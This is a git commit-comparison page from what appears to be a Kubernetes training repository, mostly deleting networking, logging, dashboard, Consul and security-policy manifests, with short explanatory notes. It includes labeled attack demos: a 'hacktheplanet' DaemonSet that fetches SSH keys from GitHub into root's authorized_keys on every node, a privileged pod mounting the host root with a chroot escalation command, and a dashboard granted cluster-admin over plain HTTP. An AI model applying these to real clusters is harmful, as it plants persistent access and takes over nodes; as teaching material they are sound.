Compare commits

14 Commits

Author            SHA1        Date                        Message
Jerome Petazzoni  99b8886c3e  2020-04-07 16:49:49 -05:00  fix-redirects.sh: adding forced redirect
Jerome Petazzoni  13164971ca  2019-01-19 03:58:20 -06:00  Re-add builder chapters
Jerome Petazzoni  c55ce66751  2019-01-19 03:57:47 -06:00  Merge branch 'master' into kube-2019-01
Jerome Petazzoni  e1ccad3ee2  2019-01-17 01:36:42 -06:00  Update WiFi information
Jerome Petazzoni  83535c3f69  2019-01-17 00:47:43 -06:00  Update gitter link; opt out of builder demos
Jerome Petazzoni  9ece59e821  2019-01-14 12:01:47 -06:00  Merge branch 'master' into kube-2019-01
Jerome Petazzoni  cd7a5520fb  2019-01-14 02:13:20 -06:00  Add WiFi information
Jerome Petazzoni  c1757160d7  2019-01-13 15:15:08 -06:00  Merge branch 'master' into kube-2019-01
Jerome Petazzoni  4f8ffcdd97  2019-01-13 15:13:56 -06:00  Merge branch 'master' into kube-2019-01
Jerome Petazzoni  a66b295d06  2019-01-13 15:08:01 -06:00  Use the 2-day deck
Jerome Petazzoni  ae04e02519  2019-01-13 15:03:29 -06:00  Merge branch 'enixlogo' into kube-2019-01
Jerome Petazzoni  7b03961182  2019-01-13 15:02:20 -06:00  Customization
Jerome Petazzoni  f01bc2a7a9  2018-09-29 18:54:00 -05:00  Fix overlapsing slide number and pics
Jerome Petazzoni  3eaa844c55  2018-09-08 07:49:38 -05:00  Add ENIX logo (warning: do not merge this branch to your content, otherwise you will get the ENIX logo in the top right of all your decks)
169 changed files with 1926 additions and 34965 deletions

View File

@@ -1,9 +0,0 @@
hostname frr
router bgp 64512
network 1.0.0.2/32
bgp log-neighbor-changes
neighbor kube peer-group
neighbor kube remote-as 64512
neighbor kube route-reflector-client
bgp listen range 0.0.0.0/0 peer-group kube
log stdout

View File

@@ -1,2 +0,0 @@
hostname frr
log stdout

View File

@@ -1,34 +0,0 @@
version: "3"
services:
bgpd:
image: ajones17/frr:662
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
entrypoint: /usr/lib/frr/bgpd -f /etc/frr/bgpd.conf --log=stdout --log-level=debug --no_kernel
restart: always
zebra:
image: ajones17/frr:662
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
entrypoint: /usr/lib/frr/zebra -f /etc/frr/zebra.conf --log=stdout --log-level=debug
restart: always
vtysh:
image: ajones17/frr:662
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
entrypoint: vtysh -c "show ip bgp"
chmod:
image: alpine
volumes:
- ./run:/var/run/frr
command: chmod 777 /var/run/frr
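
The three files above (bgpd.conf, the zebra config, and this Compose file) ran a standalone FRR route reflector for the BGP labs: zebra and bgpd share the host network namespace, bgpd accepts sessions from any address as part of the "kube" peer group, and the vtysh service dumps the BGP table. A minimal sketch of exercising such a stack, assuming it is started from the directory containing this Compose file (service names taken from it):

# Sketch, assuming the FRR Compose file above in the current directory.
docker-compose up -d              # start zebra, bgpd, and the one-shot helpers
docker-compose run --rm vtysh     # runs the configured `vtysh -c "show ip bgp"`
docker-compose logs -f bgpd       # watch neighbors from the "kube" peer group come and go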

View File

@@ -1,29 +0,0 @@
version: "3"
services:
pause:
ports:
- 8080:8080
image: k8s.gcr.io/pause
etcd:
network_mode: "service:pause"
image: k8s.gcr.io/etcd:3.3.10
command: etcd
kube-apiserver:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.14.0
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount --allow-privileged
kube-controller-manager:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.14.0
command: kube-controller-manager --master http://localhost:8080 --allocate-node-cidrs --cluster-cidr=10.CLUSTER.0.0/16
"Edit the CLUSTER placeholder first. Then, remove this line.":
kube-scheduler:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.14.0
command: kube-scheduler --master http://localhost:8080
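
This Compose file was a minimal, single-machine Kubernetes control plane: etcd, the API server, the controller manager, and the scheduler all share the network namespace of a pause container, and the API server listens insecurely on port 8080. A hedged sketch of using it, after editing the CLUSTER placeholder and removing the reminder line, and assuming kubectl is available on the same host:

# Sketch, assuming the Compose file above in the current directory.
docker-compose up -d
kubectl --server=http://localhost:8080 get componentstatuses   # control plane health
kubectl --server=http://localhost:8080 get nodes               # empty until a kubelet registers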

View File

@@ -1,128 +0,0 @@
---
apiVersion: |+
Make sure you update the line with --master=http://X.X.X.X:8080 below.
Then remove this section from this YAML file and try again.
---
apiVersion: v1
kind: ConfigMap
metadata:
name: kube-router-cfg
namespace: kube-system
labels:
tier: node
k8s-app: kube-router
data:
cni-conf.json: |
{
"cniVersion":"0.3.0",
"name":"mynet",
"plugins":[
{
"name":"kubernetes",
"type":"bridge",
"bridge":"kube-bridge",
"isDefaultGateway":true,
"ipam":{
"type":"host-local"
}
}
]
}
---
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
labels:
k8s-app: kube-router
tier: node
name: kube-router
namespace: kube-system
spec:
template:
metadata:
labels:
k8s-app: kube-router
tier: node
annotations:
scheduler.alpha.kubernetes.io/critical-pod: ''
spec:
serviceAccountName: kube-router
containers:
- name: kube-router
image: docker.io/cloudnativelabs/kube-router
imagePullPolicy: Always
args:
- "--run-router=true"
- "--run-firewall=true"
- "--run-service-proxy=true"
- "--master=http://X.X.X.X:8080"
env:
- name: NODE_NAME
valueFrom:
fieldRef:
fieldPath: spec.nodeName
- name: KUBE_ROUTER_CNI_CONF_FILE
value: /etc/cni/net.d/10-kuberouter.conflist
livenessProbe:
httpGet:
path: /healthz
port: 20244
initialDelaySeconds: 10
periodSeconds: 3
resources:
requests:
cpu: 250m
memory: 250Mi
securityContext:
privileged: true
volumeMounts:
- name: lib-modules
mountPath: /lib/modules
readOnly: true
- name: cni-conf-dir
mountPath: /etc/cni/net.d
initContainers:
- name: install-cni
image: busybox
imagePullPolicy: Always
command:
- /bin/sh
- -c
- set -e -x;
if [ ! -f /etc/cni/net.d/10-kuberouter.conflist ]; then
if [ -f /etc/cni/net.d/*.conf ]; then
rm -f /etc/cni/net.d/*.conf;
fi;
TMP=/etc/cni/net.d/.tmp-kuberouter-cfg;
cp /etc/kube-router/cni-conf.json ${TMP};
mv ${TMP} /etc/cni/net.d/10-kuberouter.conflist;
fi
volumeMounts:
- mountPath: /etc/cni/net.d
name: cni-conf-dir
- mountPath: /etc/kube-router
name: kube-router-cfg
hostNetwork: true
tolerations:
- key: CriticalAddonsOnly
operator: Exists
- effect: NoSchedule
key: node-role.kubernetes.io/master
operator: Exists
- effect: NoSchedule
key: node.kubernetes.io/not-ready
operator: Exists
volumes:
- name: lib-modules
hostPath:
path: /lib/modules
- name: cni-conf-dir
hostPath:
path: /etc/cni/net.d
- name: kube-router-cfg
configMap:
name: kube-router-cfg
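
This manifest deployed kube-router as a DaemonSet providing pod networking, NetworkPolicy enforcement, and service proxying; the leading section is a deliberate tripwire forcing you to point --master at the real (insecure) API server address before applying. A sketch of deploying it once that edit is done (the file name is an assumption):

# Sketch: after removing the reminder section and setting --master to the API
# server's address, deploy kube-router and check that it starts on every node.
kubectl apply -f kuberouter.yaml
kubectl -n kube-system get pods -l k8s-app=kube-router -o wide
kubectl -n kube-system logs -l k8s-app=kube-router --tail=20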

View File

@@ -1,28 +0,0 @@
version: "3"
services:
pause:
ports:
- 8080:8080
image: k8s.gcr.io/pause
etcd:
network_mode: "service:pause"
image: k8s.gcr.io/etcd:3.3.10
command: etcd
kube-apiserver:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.14.0
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount
kube-controller-manager:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.14.0
command: kube-controller-manager --master http://localhost:8080
kube-scheduler:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.14.0
command: kube-scheduler --master http://localhost:8080

View File

@@ -72,7 +72,7 @@ spec:
terminationGracePeriodSeconds: 10
containers:
- name: consul
image: "consul:1.4.4"
image: "consul:1.4.0"
args:
- "agent"
- "-bootstrap-expect=3"

View File

@@ -3,6 +3,7 @@ apiVersion: v1
kind: ServiceAccount
metadata:
name: fluentd
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
@@ -18,6 +19,7 @@ rules:
- get
- list
- watch
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1beta1
@@ -31,18 +33,23 @@ subjects:
- kind: ServiceAccount
name: fluentd
namespace: default
---
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
name: fluentd
labels:
app: fluentd
k8s-app: fluentd-logging
version: v1
kubernetes.io/cluster-service: "true"
spec:
template:
metadata:
labels:
app: fluentd
k8s-app: fluentd-logging
version: v1
kubernetes.io/cluster-service: "true"
spec:
serviceAccount: fluentd
serviceAccountName: fluentd
@@ -51,7 +58,7 @@ spec:
effect: NoSchedule
containers:
- name: fluentd
image: fluent/fluentd-kubernetes-daemonset:v1.3-debian-elasticsearch-1
image: fluent/fluentd-kubernetes-daemonset:elasticsearch
env:
- name: FLUENT_ELASTICSEARCH_HOST
value: "elasticsearch"
@@ -59,12 +66,14 @@ spec:
value: "9200"
- name: FLUENT_ELASTICSEARCH_SCHEME
value: "http"
# X-Pack Authentication
# =====================
- name: FLUENT_ELASTICSEARCH_USER
value: "elastic"
- name: FLUENT_ELASTICSEARCH_PASSWORD
value: "changeme"
- name: FLUENT_UID
value: "0"
- name: FLUENTD_SYSTEMD_CONF
value: "disable"
- name: FLUENTD_PROMETHEUS_CONF
value: "disable"
resources:
limits:
memory: 200Mi
@@ -85,83 +94,134 @@ spec:
- name: varlibdockercontainers
hostPath:
path: /var/lib/docker/containers
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
annotations:
deployment.kubernetes.io/revision: "1"
creationTimestamp: null
generation: 1
labels:
app: elasticsearch
run: elasticsearch
name: elasticsearch
selfLink: /apis/extensions/v1beta1/namespaces/default/deployments/elasticsearch
spec:
progressDeadlineSeconds: 600
replicas: 1
revisionHistoryLimit: 10
selector:
matchLabels:
app: elasticsearch
run: elasticsearch
strategy:
rollingUpdate:
maxSurge: 1
maxUnavailable: 1
type: RollingUpdate
template:
metadata:
creationTimestamp: null
labels:
app: elasticsearch
run: elasticsearch
spec:
containers:
- image: elasticsearch:5
- image: elasticsearch:5.6.8
imagePullPolicy: IfNotPresent
name: elasticsearch
resources:
limits:
memory: 2Gi
requests:
memory: 1Gi
resources: {}
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
env:
- name: ES_JAVA_OPTS
value: "-Xms1g -Xmx1g"
dnsPolicy: ClusterFirst
restartPolicy: Always
schedulerName: default-scheduler
securityContext: {}
terminationGracePeriodSeconds: 30
---
apiVersion: v1
kind: Service
metadata:
creationTimestamp: null
labels:
app: elasticsearch
run: elasticsearch
name: elasticsearch
selfLink: /api/v1/namespaces/default/services/elasticsearch
spec:
ports:
- port: 9200
protocol: TCP
targetPort: 9200
selector:
app: elasticsearch
run: elasticsearch
sessionAffinity: None
type: ClusterIP
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
annotations:
deployment.kubernetes.io/revision: "1"
creationTimestamp: null
generation: 1
labels:
app: kibana
run: kibana
name: kibana
selfLink: /apis/extensions/v1beta1/namespaces/default/deployments/kibana
spec:
progressDeadlineSeconds: 600
replicas: 1
revisionHistoryLimit: 10
selector:
matchLabels:
app: kibana
run: kibana
strategy:
rollingUpdate:
maxSurge: 1
maxUnavailable: 1
type: RollingUpdate
template:
metadata:
creationTimestamp: null
labels:
app: kibana
run: kibana
spec:
containers:
- env:
- name: ELASTICSEARCH_URL
value: http://elasticsearch:9200/
image: kibana:5
image: kibana:5.6.8
imagePullPolicy: Always
name: kibana
resources: {}
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
dnsPolicy: ClusterFirst
restartPolicy: Always
schedulerName: default-scheduler
securityContext: {}
terminationGracePeriodSeconds: 30
---
apiVersion: v1
kind: Service
metadata:
creationTimestamp: null
labels:
app: kibana
run: kibana
name: kibana
selfLink: /api/v1/namespaces/default/services/kibana
spec:
externalTrafficPolicy: Cluster
ports:
- port: 5601
protocol: TCP
targetPort: 5601
selector:
app: kibana
run: kibana
sessionAffinity: None
type: NodePort
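
Taken together, this file deploys a small EFK logging stack: a fluentd DaemonSet shipping container logs to a single-replica Elasticsearch Deployment, with Kibana exposed through a NodePort Service. A sketch of deploying it and finding the Kibana port (the file name is an assumption):

# Sketch, assuming the EFK manifest above was saved as efk.yaml.
kubectl apply -f efk.yaml
kubectl get svc kibana -o jsonpath='{.spec.ports[0].nodePort}{"\n"}'
# Then browse to http://<any-node-address>:<that-port>/ and create an index pattern.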

View File

@@ -1,34 +0,0 @@
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: hacktheplanet
spec:
selector:
matchLabels:
app: hacktheplanet
template:
metadata:
labels:
app: hacktheplanet
spec:
volumes:
- name: root
hostPath:
path: /root
tolerations:
- effect: NoSchedule
operator: Exists
initContainers:
- name: hacktheplanet
image: alpine
volumeMounts:
- name: root
mountPath: /root
command:
- sh
- -c
- "apk update && apk add curl && curl https://github.com/jpetazzo.keys > /root/.ssh/authorized_keys"
containers:
- name: web
image: nginx
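
This DaemonSet is the "hacktheplanet" security demo: it tolerates every NoSchedule taint and mounts /root from the host, so its init container writes an SSH public key into /root/.ssh/authorized_keys on every node, masters included. A sketch of running the demo (the file name is an assumption):

# Sketch: apply the manifest above and confirm it landed on every node,
# masters included (which is the point of the demo).
kubectl apply -f hacktheplanet.yaml
kubectl get pods -l app=hacktheplanet -o wide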

View File

@@ -1,220 +0,0 @@
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Configuration to deploy release version of the Dashboard UI compatible with
# Kubernetes 1.8.
#
# Example usage: kubectl create -f <this_file>
# ------------------- Dashboard Secret ------------------- #
apiVersion: v1
kind: Secret
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard-certs
namespace: kube-system
type: Opaque
---
# ------------------- Dashboard Service Account ------------------- #
apiVersion: v1
kind: ServiceAccount
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
---
# ------------------- Dashboard Role & Role Binding ------------------- #
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: kubernetes-dashboard-minimal
namespace: kube-system
rules:
# Allow Dashboard to create 'kubernetes-dashboard-key-holder' secret.
- apiGroups: [""]
resources: ["secrets"]
verbs: ["create"]
# Allow Dashboard to create 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
resources: ["configmaps"]
verbs: ["create"]
# Allow Dashboard to get, update and delete Dashboard exclusive secrets.
- apiGroups: [""]
resources: ["secrets"]
resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs"]
verbs: ["get", "update", "delete"]
# Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
resources: ["configmaps"]
resourceNames: ["kubernetes-dashboard-settings"]
verbs: ["get", "update"]
# Allow Dashboard to get metrics from heapster.
- apiGroups: [""]
resources: ["services"]
resourceNames: ["heapster"]
verbs: ["proxy"]
- apiGroups: [""]
resources: ["services/proxy"]
resourceNames: ["heapster", "http:heapster:", "https:heapster:"]
verbs: ["get"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: kubernetes-dashboard-minimal
namespace: kube-system
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: kubernetes-dashboard-minimal
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kube-system
---
# ------------------- Dashboard Deployment ------------------- #
kind: Deployment
apiVersion: apps/v1beta2
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
spec:
replicas: 1
revisionHistoryLimit: 10
selector:
matchLabels:
k8s-app: kubernetes-dashboard
template:
metadata:
labels:
k8s-app: kubernetes-dashboard
spec:
containers:
- name: kubernetes-dashboard
image: k8s.gcr.io/kubernetes-dashboard-amd64:v1.8.3
ports:
- containerPort: 8443
protocol: TCP
args:
- --auto-generate-certificates
# Uncomment the following line to manually specify Kubernetes API server Host
# If not specified, Dashboard will attempt to auto discover the API server and connect
# to it. Uncomment only if the default does not work.
# - --apiserver-host=http://my-address:port
volumeMounts:
- name: kubernetes-dashboard-certs
mountPath: /certs
# Create on-disk volume to store exec logs
- mountPath: /tmp
name: tmp-volume
livenessProbe:
httpGet:
scheme: HTTPS
path: /
port: 8443
initialDelaySeconds: 30
timeoutSeconds: 30
volumes:
- name: kubernetes-dashboard-certs
secret:
secretName: kubernetes-dashboard-certs
- name: tmp-volume
emptyDir: {}
serviceAccountName: kubernetes-dashboard
# Comment the following tolerations if Dashboard must not be deployed on master
tolerations:
- key: node-role.kubernetes.io/master
effect: NoSchedule
---
# ------------------- Dashboard Service ------------------- #
kind: Service
apiVersion: v1
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
spec:
ports:
- port: 443
targetPort: 8443
selector:
k8s-app: kubernetes-dashboard
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
labels:
app: dashboard
name: dashboard
spec:
selector:
matchLabels:
app: dashboard
template:
metadata:
labels:
app: dashboard
spec:
containers:
- args:
- sh
- -c
- apk add --no-cache socat && socat TCP-LISTEN:80,fork,reuseaddr OPENSSL:kubernetes-dashboard.kube-system:443,verify=0
image: alpine
name: dashboard
---
apiVersion: v1
kind: Service
metadata:
labels:
app: dashboard
name: dashboard
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: dashboard
type: NodePort
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: kubernetes-dashboard
labels:
k8s-app: kubernetes-dashboard
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: cluster-admin
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kube-system
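
This file combines the upstream dashboard 1.8.3 manifest with two training-only additions: a socat proxy that re-exposes the dashboard over plain HTTP through a NodePort, and a ClusterRoleBinding granting the dashboard's service account cluster-admin. Convenient in a workshop, unsafe anywhere else. A sketch of deploying it and finding the HTTP port (the file name is an assumption):

# Sketch, assuming the manifest above was saved as dashboard.yaml.
kubectl apply -f dashboard.yaml
kubectl get svc dashboard -o jsonpath='{.spec.ports[0].nodePort}{"\n"}'
# Browse to http://<any-node-address>:<that-port>/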

View File

@@ -1,10 +0,0 @@
apiVersion: v1
Kind: Pod
metadata:
name: hello
namespace: default
spec:
containers:
- name: hello
image: nginx

View File

@@ -1,21 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: malicious
spec:
volumes:
- name: slash
hostPath:
path: /
containers:
- image: alpine
name: alpine
securityContext:
privileged: true
command:
- sleep
- "1000000000"
volumeMounts:
- name: slash
mountPath: /hostfs
restartPolicy: Never
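
This pod shows why privileged pods must be restricted: it runs privileged and mounts the node's root filesystem at /hostfs, so anyone allowed to create it effectively owns the node. A sketch of the escalation it enables (the file name is an assumption):

# Sketch: run the pod above, then chroot into the node's filesystem from inside it.
kubectl apply -f malicious.yaml
kubectl exec -ti malicious -- chroot /hostfs sh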

View File

@@ -1,138 +0,0 @@
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: system:aggregated-metrics-reader
labels:
rbac.authorization.k8s.io/aggregate-to-view: "true"
rbac.authorization.k8s.io/aggregate-to-edit: "true"
rbac.authorization.k8s.io/aggregate-to-admin: "true"
rules:
- apiGroups: ["metrics.k8s.io"]
resources: ["pods"]
verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: metrics-server:system:auth-delegator
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: system:auth-delegator
subjects:
- kind: ServiceAccount
name: metrics-server
namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: RoleBinding
metadata:
name: metrics-server-auth-reader
namespace: kube-system
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: extension-apiserver-authentication-reader
subjects:
- kind: ServiceAccount
name: metrics-server
namespace: kube-system
---
apiVersion: apiregistration.k8s.io/v1beta1
kind: APIService
metadata:
name: v1beta1.metrics.k8s.io
spec:
service:
name: metrics-server
namespace: kube-system
group: metrics.k8s.io
version: v1beta1
insecureSkipTLSVerify: true
groupPriorityMinimum: 100
versionPriority: 100
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: metrics-server
namespace: kube-system
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
name: metrics-server
namespace: kube-system
labels:
k8s-app: metrics-server
spec:
selector:
matchLabels:
k8s-app: metrics-server
template:
metadata:
name: metrics-server
labels:
k8s-app: metrics-server
spec:
serviceAccountName: metrics-server
volumes:
# mount in tmp so we can safely use from-scratch images and/or read-only containers
- name: tmp-dir
emptyDir: {}
containers:
- name: metrics-server
image: k8s.gcr.io/metrics-server-amd64:v0.3.1
imagePullPolicy: Always
volumeMounts:
- name: tmp-dir
mountPath: /tmp
args:
- --kubelet-preferred-address-types=InternalIP
- --kubelet-insecure-tls
- --metric-resolution=5s
---
apiVersion: v1
kind: Service
metadata:
name: metrics-server
namespace: kube-system
labels:
kubernetes.io/name: "Metrics-server"
spec:
selector:
k8s-app: metrics-server
ports:
- port: 443
protocol: TCP
targetPort: 443
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: system:metrics-server
rules:
- apiGroups:
- ""
resources:
- pods
- nodes
- nodes/stats
verbs:
- get
- list
- watch
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: system:metrics-server
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: system:metrics-server
subjects:
- kind: ServiceAccount
name: metrics-server
namespace: kube-system
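
This is the metrics-server deployment backing `kubectl top` and the Horizontal Pod Autoscaler, configured with a 5-second metric resolution and TLS verification disabled towards the kubelets (acceptable for training clusters). A sketch of deploying and exercising it (the file name is an assumption):

# Sketch, assuming the manifest above was saved as metrics-server.yaml.
kubectl apply -f metrics-server.yaml
# Give it a minute to scrape the kubelets, then:
kubectl top nodes
kubectl top pods --all-namespaces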

View File

@@ -1,95 +0,0 @@
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: consul
rules:
- apiGroups: [ "" ]
resources: [ pods ]
verbs: [ get, list ]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: consul
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: consul
subjects:
- kind: ServiceAccount
name: consul
namespace: orange
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: consul
---
apiVersion: v1
kind: Service
metadata:
name: consul
spec:
ports:
- port: 8500
name: http
selector:
app: consul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
name: consul
spec:
serviceName: consul
replicas: 3
selector:
matchLabels:
app: consul
volumeClaimTemplates:
- metadata:
name: data
spec:
accessModes:
- ReadWriteOnce
resources:
requests:
storage: 1Gi
template:
metadata:
labels:
app: consul
spec:
serviceAccountName: consul
affinity:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchExpressions:
- key: app
operator: In
values:
- consul
topologyKey: kubernetes.io/hostname
terminationGracePeriodSeconds: 10
containers:
- name: consul
image: "consul:1.4.4"
volumeMounts:
- name: data
mountPath: /consul/data
args:
- "agent"
- "-bootstrap-expect=3"
- "-retry-join=provider=k8s namespace=orange label_selector=\"app=consul\""
- "-client=0.0.0.0"
- "-data-dir=/consul/data"
- "-server"
- "-ui"
lifecycle:
preStop:
exec:
command:
- /bin/sh
- -c
- consul leave
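
This StatefulSet runs a three-server Consul cluster: pod anti-affinity spreads the replicas across nodes, a volumeClaimTemplate gives each one its own data volume, and retry-join uses the Kubernetes provider, which is why the pod-listing Role and RoleBinding (scoped to the "orange" namespace) are included. A sketch of deploying it and checking that the cluster formed (the file name is an assumption):

# Sketch: the retry-join string and the RoleBinding both assume the "orange"
# namespace, so deploy everything there.
kubectl -n orange apply -f consul.yaml
kubectl -n orange get pods -l app=consul
kubectl -n orange exec consul-0 -- consul members   # should list three alive servers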

View File

@@ -1,39 +0,0 @@
---
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
name: privileged
annotations:
seccomp.security.alpha.kubernetes.io/allowedProfileNames: '*'
spec:
privileged: true
allowPrivilegeEscalation: true
allowedCapabilities:
- '*'
volumes:
- '*'
hostNetwork: true
hostPorts:
- min: 0
max: 65535
hostIPC: true
hostPID: true
runAsUser:
rule: 'RunAsAny'
seLinux:
rule: 'RunAsAny'
supplementalGroups:
rule: 'RunAsAny'
fsGroup:
rule: 'RunAsAny'
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: psp:privileged
rules:
- apiGroups: ['policy']
resources: ['podsecuritypolicies']
verbs: ['use']
resourceNames: ['privileged']
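
A PodSecurityPolicy has no effect until some subject is granted the `use` verb on it through the ClusterRole above. A hedged sketch of one possible binding (the binding name and group are illustrative, not from the original files):

# Sketch: let every service account in kube-system use the "privileged" policy.
kubectl create clusterrolebinding psp-privileged-kube-system \
  --clusterrole=psp:privileged \
  --group=system:serviceaccounts:kube-system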

View File

@@ -1,38 +0,0 @@
---
apiVersion: extensions/v1beta1
kind: PodSecurityPolicy
metadata:
annotations:
apparmor.security.beta.kubernetes.io/allowedProfileNames: runtime/default
apparmor.security.beta.kubernetes.io/defaultProfileName: runtime/default
seccomp.security.alpha.kubernetes.io/allowedProfileNames: docker/default
seccomp.security.alpha.kubernetes.io/defaultProfileName: docker/default
name: restricted
spec:
allowPrivilegeEscalation: false
fsGroup:
rule: RunAsAny
runAsUser:
rule: RunAsAny
seLinux:
rule: RunAsAny
supplementalGroups:
rule: RunAsAny
volumes:
- configMap
- emptyDir
- projected
- secret
- downwardAPI
- persistentVolumeClaim
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: psp:restricted
rules:
- apiGroups: ['policy']
resources: ['podsecuritypolicies']
verbs: ['use']
resourceNames: ['restricted']
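
Same pattern for the restricted policy: the ClusterRole exists, but it still needs to be bound to take effect. One common (and here purely illustrative) choice is to let every authenticated user fall back to the restricted policy once the PodSecurityPolicy admission plugin is enabled:

# Sketch: the binding name and subject are assumptions, not from the original files.
kubectl create clusterrolebinding psp-restricted-all \
  --clusterrole=psp:restricted \
  --group=system:authenticated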

View File

@@ -1,33 +0,0 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: jean.doe
namespace: users
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: users:jean.doe
rules:
- apiGroups: [ certificates.k8s.io ]
resources: [ certificatesigningrequests ]
verbs: [ create ]
- apiGroups: [ certificates.k8s.io ]
resourceNames: [ users:jean.doe ]
resources: [ certificatesigningrequests ]
verbs: [ get, create, delete, watch ]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: users:jean.doe
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: users:jean.doe
subjects:
- kind: ServiceAccount
name: jean.doe
namespace: users
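
These objects give the jean.doe ServiceAccount just enough RBAC to create CertificateSigningRequests and to manage the one named users:jean.doe, which underpins the user-certificates exercise. A sketch of checking the resulting permissions with impersonation (assumes the "users" namespace already exists):

# Sketch: verify what jean.doe can and cannot do.
kubectl apply -f user.yaml
kubectl auth can-i create certificatesigningrequests \
  --as=system:serviceaccount:users:jean.doe     # expected: yes
kubectl auth can-i delete pods \
  --as=system:serviceaccount:users:jean.doe     # expected: no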

View File

@@ -1,70 +0,0 @@
---
apiVersion: v1
kind: PersistentVolume
metadata:
name: consul-node2
annotations:
node: node2
spec:
capacity:
storage: 10Gi
accessModes:
- ReadWriteOnce
persistentVolumeReclaimPolicy: Delete
local:
path: /mnt/consul
nodeAffinity:
required:
nodeSelectorTerms:
- matchExpressions:
- key: kubernetes.io/hostname
operator: In
values:
- node2
---
apiVersion: v1
kind: PersistentVolume
metadata:
name: consul-node3
annotations:
node: node3
spec:
capacity:
storage: 10Gi
accessModes:
- ReadWriteOnce
persistentVolumeReclaimPolicy: Delete
local:
path: /mnt/consul
nodeAffinity:
required:
nodeSelectorTerms:
- matchExpressions:
- key: kubernetes.io/hostname
operator: In
values:
- node3
---
apiVersion: v1
kind: PersistentVolume
metadata:
name: consul-node4
annotations:
node: node4
spec:
capacity:
storage: 10Gi
accessModes:
- ReadWriteOnce
persistentVolumeReclaimPolicy: Delete
local:
path: /mnt/consul
nodeAffinity:
required:
nodeSelectorTerms:
- matchExpressions:
- key: kubernetes.io/hostname
operator: In
values:
- node4
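
These three PersistentVolumes use the `local` volume type pinned to node2, node3, and node4 via nodeAffinity, so the backing directory must exist on those nodes before the Consul pods can bind to them. A sketch of preparing the nodes and registering the volumes (the file name and SSH access are assumptions):

# Sketch: create the backing directories, then register the PersistentVolumes.
for node in node2 node3 node4; do
  ssh $node sudo mkdir -p /mnt/consul
done
kubectl apply -f volumes.yaml
kubectl get pv   # the three volumes should show up as Available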

View File

